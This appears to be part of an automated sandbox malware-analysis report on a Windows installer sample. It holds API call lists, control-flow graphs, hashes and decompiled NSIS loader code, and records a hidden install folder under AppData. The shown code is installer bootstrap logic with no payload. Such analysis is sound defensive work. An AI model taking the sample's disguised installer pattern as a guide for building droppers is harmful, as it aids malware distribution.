                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                • DestroyWindow.USER32 ref: 00403FFF
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                • GetDlgItem.USER32 ref: 00404037
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                • GetDlgItem.USER32 ref: 004040FD
                                                • GetDlgItem.USER32 ref: 00404107
                                                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404121
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                • GetDlgItem.USER32 ref: 00404218
                                                • ShowWindow.USER32(00000000,?), ref: 00404239
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                • EnableWindow.USER32(?,?), ref: 00404266
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                • EnableMenuItem.USER32 ref: 00404283
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 3618520773-0
                                                • Opcode ID: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
                                                • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                • Opcode Fuzzy Hash: 3c9ae7d6275b35c3fda3dee6dbafb97324a8be4c9a106d3b0ef57b82a36e873a
                                                • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403bdb GetUserDefaultUILanguage call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 308 403be0 304->308 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 312 403c3c-403c65 call 403e8c call 405ede 308->312 310->312 311->310 318 403cf7-403cff call 405ede 312->318 319 403c6b-403c70 312->319 325 403d01-403d08 call 406544 318->325 326 403d0d-403d32 LoadImageW 318->326 319->318 320 403c76-403c9e call 4063d5 319->320 320->318 329 403ca0-403ca4 320->329 325->326 327 403db3-403dbb call 40140b 326->327 328 403d34-403d64 RegisterClassW 326->328 342 403dc5-403dd0 call 403e8c 327->342 343 403dbd-403dc0 327->343 331 403e82 328->331 332 403d6a-403dae SystemParametersInfoW CreateWindowExW 328->332 334 403cb6-403cc2 lstrlenW 329->334 335 403ca6-403cb3 call 405e03 329->335 340 403e84-403e8b 331->340 332->327 336 403cc4-403cd2 lstrcmpiW 334->336 337 403cea-403cf2 call 405dd6 call 406507 334->337 335->334 336->337 341 403cd4-403cde GetFileAttributesW 336->341 337->318 346 403ce0-403ce2 341->346 347 403ce4-403ce5 call 405e22 341->347 353 403dd6-403df0 ShowWindow call 406864 342->353 354 403e59-403e5a call 40563c 342->354 343->340 346->337 346->347 347->337 361 403df2-403df7 call 406864 353->361 362 403dfc-403e0e GetClassInfoW 353->362 357 403e5f-403e61 354->357 359 403e63-403e69 357->359 360 403e7b-403e7d call 40140b 357->360 359->343 363 403e6f-403e76 call 40140b 359->363 360->331 361->362 366 403e10-403e20 GetClassInfoW RegisterClassW 362->366 367 403e26-403e49 DialogBoxParamW call 40140b 362->367 363->343 366->367 370 403e4e-403e57 call 403b06 367->370 370->340
                                                C-Code - Quality: 96%
                                                			E00403BB6(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t22;
                                                				void* _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				void* _t36;
                                                				int _t39;
                                                				int _t40;
                                                				int _t44;
                                                				short _t63;
                                                				WCHAR* _t65;
                                                				signed char _t69;
                                                				signed short _t73;
                                                				WCHAR* _t76;
                                                				intOrPtr _t82;
                                                				WCHAR* _t87;
                                                
                                                				_t82 =  *0x42a230;
                                                				_t22 = E004068D4(2);
                                                				_t90 = _t22;
                                                				if(_t22 == 0) {
                                                					_t76 = 0x423708;
                                                					L"1033" = 0x30;
                                                					 *0x437002 = 0x78;
                                                					 *0x437004 = 0;
                                                					E004063D5(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423708, 0);
                                                					__eflags =  *0x423708;
                                                					if(__eflags == 0) {
                                                						E004063D5(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423708, 0);
                                                					}
                                                					lstrcatW(L"1033", _t76);
                                                				} else {
                                                					_t73 =  *_t22(); // executed
                                                					E0040644E(L"1033", _t73 & 0x0000ffff);
                                                				}
                                                				E00403E8C(_t78, _t90);
                                                				_t86 = L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially";
                                                				 *0x42a2a0 =  *0x42a238 & 0x00000020;
                                                				 *0x42a2bc = 0x10000;
                                                				if(E00405EDE(_t90, L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially") != 0) {
                                                					L16:
                                                					if(E00405EDE(_t98, _t86) == 0) {
                                                						E00406544(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                					}
                                                					_t30 = LoadImageW( *0x42a220, 0x67, 1, 0, 0, 0x8040); // executed
                                                					 *0x429208 = _t30;
                                                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t32 = E00403E8C(_t78, __eflags);
                                                							__eflags =  *0x42a2c0;
                                                							if( *0x42a2c0 != 0) {
                                                								_t33 = E0040563C(_t32, 0);
                                                								__eflags = _t33;
                                                								if(_t33 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x4291ec;
                                                								if( *0x4291ec == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x4236e8, 5); // executed
                                                							_t39 = E00406864("RichEd20"); // executed
                                                							__eflags = _t39;
                                                							if(_t39 == 0) {
                                                								E00406864("RichEd32");
                                                							}
                                                							_t87 = L"RichEdit20W";
                                                							_t40 = GetClassInfoW(0, _t87, 0x4291c0);
                                                							__eflags = _t40;
                                                							if(_t40 == 0) {
                                                								GetClassInfoW(0, L"RichEdit", 0x4291c0);
                                                								 *0x4291e4 = _t87;
                                                								RegisterClassW(0x4291c0);
                                                							}
                                                							_t44 = DialogBoxParamW( *0x42a220,  *0x429200 + 0x00000069 & 0x0000ffff, 0, E00403F64, 0); // executed
                                                							E00403B06(E0040140B(5), 1);
                                                							return _t44;
                                                						}
                                                						L22:
                                                						_t36 = 2;
                                                						return _t36;
                                                					} else {
                                                						_t78 =  *0x42a220;
                                                						 *0x4291c4 = E00401000;
                                                						 *0x4291d0 =  *0x42a220;
                                                						 *0x4291d4 = _t30;
                                                						 *0x4291e4 = 0x40a380;
                                                						if(RegisterClassW(0x4291c0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                						 *0x4236e8 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a220, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t78 =  *(_t82 + 0x48);
                                                					_t92 = _t78;
                                                					if(_t78 == 0) {
                                                						goto L16;
                                                					}
                                                					_t76 = 0x4281c0;
                                                					E004063D5(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a258 + _t78 * 2,  *0x42a258 +  *(_t82 + 0x4c) * 2, 0x4281c0, 0);
                                                					_t63 =  *0x4281c0; // 0x43
                                                					if(_t63 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t63 == 0x22) {
                                                						_t76 = 0x4281c2;
                                                						 *((short*)(E00405E03(0x4281c2, 0x22))) = 0;
                                                					}
                                                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                						L15:
                                                						E00406507(_t86, E00405DD6(_t76));
                                                						goto L16;
                                                					} else {
                                                						_t69 = GetFileAttributesW(_t76);
                                                						if(_t69 == 0xffffffff) {
                                                							L14:
                                                							E00405E22(_t76);
                                                							goto L15;
                                                						}
                                                						_t98 = _t69 & 0x00000010;
                                                						if((_t69 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}

























                                                0x00403bbc
                                                0x00403bc5
                                                0x00403bcc
                                                0x00403bce
                                                0x00403be2
                                                0x00403bf4
                                                0x00403bfd
                                                0x00403c06
                                                0x00403c0d
                                                0x00403c12
                                                0x00403c19
                                                0x00403c2c
                                                0x00403c2c
                                                0x00403c37
                                                0x00403bd0
                                                0x00403bd0
                                                0x00403bdb
                                                0x00403bdb
                                                0x00403c3c
                                                0x00403c46
                                                0x00403c4f
                                                0x00403c54
                                                0x00403c65
                                                0x00403cf7
                                                0x00403cff
                                                0x00403d08
                                                0x00403d08
                                                0x00403d1e
                                                0x00403d24
                                                0x00403d32
                                                0x00403db3
                                                0x00403dbb
                                                0x00403dc5
                                                0x00403dca
                                                0x00403dd0
                                                0x00403e5a
                                                0x00403e5f
                                                0x00403e61
                                                0x00403e7d
                                                0x00000000
                                                0x00403e7d
                                                0x00403e63
                                                0x00403e69
                                                0x00403e71
                                                0x00403e71
                                                0x00000000
                                                0x00403e69
                                                0x00403dde
                                                0x00403de9
                                                0x00403dee
                                                0x00403df0
                                                0x00403df7
                                                0x00403df7
                                                0x00403e02
                                                0x00403e0a
                                                0x00403e0c
                                                0x00403e0e
                                                0x00403e17
                                                0x00403e1a
                                                0x00403e20
                                                0x00403e20
                                                0x00403e3f
                                                0x00403e50
                                                0x00000000
                                                0x00403e55
                                                0x00403dbd
                                                0x00403dbf
                                                0x00000000
                                                0x00403d34
                                                0x00403d34
                                                0x00403d40
                                                0x00403d4a
                                                0x00403d50
                                                0x00403d55
                                                0x00403d64
                                                0x00403e82
                                                0x00403e82
                                                0x00000000
                                                0x00403e82
                                                0x00403d73
                                                0x00403dae
                                                0x00000000
                                                0x00403dae
                                                0x00403c6b
                                                0x00403c6b
                                                0x00403c6e
                                                0x00403c70
                                                0x00000000
                                                0x00000000
                                                0x00403c7e
                                                0x00403c90
                                                0x00403c95
                                                0x00403c9e
                                                0x00000000
                                                0x00000000
                                                0x00403ca4
                                                0x00403ca6
                                                0x00403cb3
                                                0x00403cb3
                                                0x00403cbc
                                                0x00403cc2
                                                0x00403cea
                                                0x00403cf2
                                                0x00000000
                                                0x00403cd4
                                                0x00403cd5
                                                0x00403cde
                                                0x00403ce4
                                                0x00403ce5
                                                0x00000000
                                                0x00403ce5
                                                0x00403ce0
                                                0x00403ce2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403ce2
                                                0x00403cc2

                                                APIs
                                                  • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                  • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                                                  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,76CDFAA0), ref: 00403CB7
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CD5
                                                • LoadImageW.USER32 ref: 00403D1E
                                                • RegisterClassW.USER32 ref: 00403D5B
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                                                • CreateWindowExW.USER32 ref: 00403DA8
                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                • GetClassInfoW.USER32 ref: 00403E0A
                                                • GetClassInfoW.USER32 ref: 00403E17
                                                • RegisterClassW.USER32 ref: 00403E20
                                                • DialogBoxParamW.USER32 ref: 00403E3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 606308-2675166517
                                                • Opcode ID: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
                                                • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                • Opcode Fuzzy Hash: e27dd36c7e3ea7d4b0518f1200331748326bb14958ad4778a213b023eb595640
                                                • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 377 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 374->377 378 4030cd-4030d2 374->378 386 4031f0-4031fe call 403019 377->386 387 40310b 377->387 379 4032ad-4032b1 378->379 393 403200-403203 386->393 394 403253-403258 386->394 389 403110-403127 387->389 391 403129 389->391 392 40312b-403134 call 403499 389->392 391->392 400 40325a-403262 call 403019 392->400 401 40313a-403141 392->401 396 403205-40321d call 4034af call 403499 393->396 397 403227-403251 GlobalAlloc call 4034af call 4032b4 393->397 394->379 396->394 424 40321f-403225 396->424 397->394 422 403264-403275 397->422 400->394 406 403143-403157 call 405fb2 401->406 407 4031bd-4031c1 401->407 412 4031cb-4031d1 406->412 421 403159-403160 406->421 411 4031c3-4031ca call 403019 407->411 407->412 411->412 418 4031e0-4031e8 412->418 419 4031d3-4031dd call 4069c1 412->419 418->389 423 4031ee 418->423 419->418 421->412 427 403162-403169 421->427 428 403277 422->428 429 40327d-403282 422->429 423->386 424->394 424->397 427->412 430 40316b-403172 427->430 428->429 431 403283-403289 429->431 430->412 432 403174-40317b 430->432 431->431 433 40328b-4032a6 SetFilePointer call 405fb2 431->433 432->412 434 40317d-40319d 432->434 437 4032ab 433->437 434->394 436 4031a3-4031a7 434->436 438 4031a9-4031ad 436->438 439 4031af-4031b7 436->439 437->379 438->423 438->439 439->412 440 4031b9-4031bb 439->440 440->412
                                                C-Code - Quality: 78%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				long _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				long _t70;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				void* _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				long _t90;
                                                				long _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = L"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe";
                                                				 *0x42a22c = _t43 + 0x3e8;
                                                				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe", 0x400);
                                                				_t89 = E00405FF7(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				_t92 = L"C:\\Users\\jones\\Desktop";
                                                				E00406507(L"C:\\Users\\jones\\Desktop", _t91);
                                                				E00406507(0x439000, E00405E22(_t92));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				 *0x420ec4 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					if( *0x42a234 == _t82) {
                                                						goto L29;
                                                					}
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x403847
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034AF( *0x42a234 + 0x1c);
                                                						_t35 =  &_v24; // 0x403847
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						if(_t57 == _v24) {
                                                							 *0x42a230 = _t94;
                                                							 *0x42a238 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x42a23c =  *0x42a23c + 1;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FB2(0x42a240, _t94 + 4, 0x40);
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034AF( *0x414eb8);
                                                					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
                                                						goto L29;
                                                					} else {
                                                						goto L28;
                                                					}
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						if(E00403499(0x40ceb8, _t90) == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						if( *0x42a234 != 0) {
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FB2( &_v44, 0x40ceb8, 0x1c);
                                                						_t77 = _v44;
                                                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                							_a4 = _a4 | _t77;
                                                							_t87 =  *0x414eb8; // 0x4af63
                                                							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
                                                							_t80 = _v20;
                                                							 *0x42a234 = _t87;
                                                							if(_t80 > _t93) {
                                                								goto L29;
                                                							}
                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                								_v8 = _v8 + 1;
                                                								_t93 = _t80 - 4;
                                                								if(_t90 > _t93) {
                                                									_t90 = _t93;
                                                								}
                                                								goto L20;
                                                							} else {
                                                								break;
                                                							}
                                                						}
                                                						L20:
                                                						if(_t93 <  *0x420ec4) {
                                                							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
                                                						}
                                                						 *0x414eb8 =  *0x414eb8 + _t90;
                                                						_t93 = _t93 - _t90;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					goto L24;
                                                				}
                                                			}





























                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x0040308e
                                                0x00403094
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030d8
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x00403251
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x00403141
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403157
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031af
                                                0x004031b2
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xKBLVUHoY6.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                                  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xKBLVUHoY6.exe,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xKBLVUHoY6.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-2196791212
                                                • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                                • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                                • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
